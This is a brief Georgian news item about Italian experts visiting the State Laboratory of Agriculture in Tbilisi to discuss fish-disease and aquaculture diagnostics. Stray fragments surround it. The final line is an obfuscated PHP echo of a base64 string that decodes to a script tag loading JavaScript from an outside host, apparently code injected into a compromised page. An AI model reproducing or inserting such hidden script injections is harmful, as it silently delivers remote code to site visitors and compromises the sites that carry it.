celsiusi
ავერსი შნაიდერი

პროექტის „გარემოს დაცვისა და კლიმატის ცვლილების წინააღმდეგ ბრძოლის ხელშეწყობა საქართველოში“ ფარგლებში, სოფლის მეურნეობის სახელმწიფო ლაბორატორიაში იტალიელი ექსპერტები იმყოფებოდნენ.

გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ინფორმაციით, სტუმრებმა თბილისის ლაბორატორიის სურსათის კვლევისა და ცხოველთა დაავადებების დიაგნოსტიკის დეპარტამენტები დაათვალიერეს და სამომავლო თანამშრომლობის საკითხებზე იმსჯელეს.

„ლაბორატორიის სპეციალისტებმა ექსპერტებს თევზისა და თევზის დაავადებების დიაგნოსტიკის მიმართულებებით ლაბორატორიაში დანერგილი კვლევები გააცნეს. მხარეებმა აკვაკულტურის დიაგნოსტიკაში სოფლის მეურნეობის სახელმწიფო ლაბორატორიის სამომავლო გეგმები განიხილეს.

აღსანიშნავია, რომ სოფლის მეურნეობის სახელმწიფო ლაბორატორია აქტიურად თანამშრომლობს ექსპერტებთან და საერთაშორისო ორგანიზაციებთან“, – ნათქვამია გარემოს დაცვისა და სოფლის მეურნეობის სამინისტროს ინფორმაციაში. 

384
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");